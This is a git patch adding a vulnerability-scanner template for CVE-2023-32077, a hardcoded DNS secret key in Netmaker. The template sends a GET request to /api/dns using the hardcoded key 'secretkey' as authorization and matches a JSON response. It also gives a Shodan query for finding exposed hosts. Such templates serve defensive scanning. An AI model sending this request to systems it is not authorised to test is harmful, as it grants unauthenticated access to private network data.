From b0ad44e496ec87db6825c7c1443dd55285515c20 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 29 Apr 2024 18:24:31 +0530 Subject: [PATCH] Create CVE-2023-32077.yaml --- http/cves/2024/CVE-2023-32077.yaml | 39 ++++++++++++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 http/cves/2024/CVE-2023-32077.yaml diff --git a/http/cves/2024/CVE-2023-32077.yaml b/http/cves/2024/CVE-2023-32077.yaml new file mode 100644 index 0000000000..56d58ef4eb --- /dev/null +++ b/http/cves/2024/CVE-2023-32077.yaml @@ -0,0 +1,39 @@ + id: CVE-2023-32077 + + info: + name: Netmaker - Hardcoded DNS Secret Key + author: iamnoooob,rootxharsh,pdresearch + severity: high + description: | + Netmaker makes networks with WireGuard. Prior to versions 0.17.1 and 0.18.6, hardcoded DNS key usage has been found in Netmaker allowing unauth users to interact with DNS API endpoints. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2023-32077 + cwe-id: CWE-321,CWE-798 + epss-score: 0.0006 + epss-percentile: 0.24707 + cpe: cpe:2.3:a:gravitl:netmaker:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: gravitl + product: netmaker + shodan-query: html:"netmaker" + tags: cve,cve2023,info-key,netmaker + + http: + - method: GET + path: + - "{{BaseURL}}/api/dns" + + headers: + Authorization: "x secretkey" + + matchers: + - type: dsl + dsl: + - 'contains_all(body, "address", "network")' + - 'status_code == 200' + - 'contains(header, "application/json")' + condition: and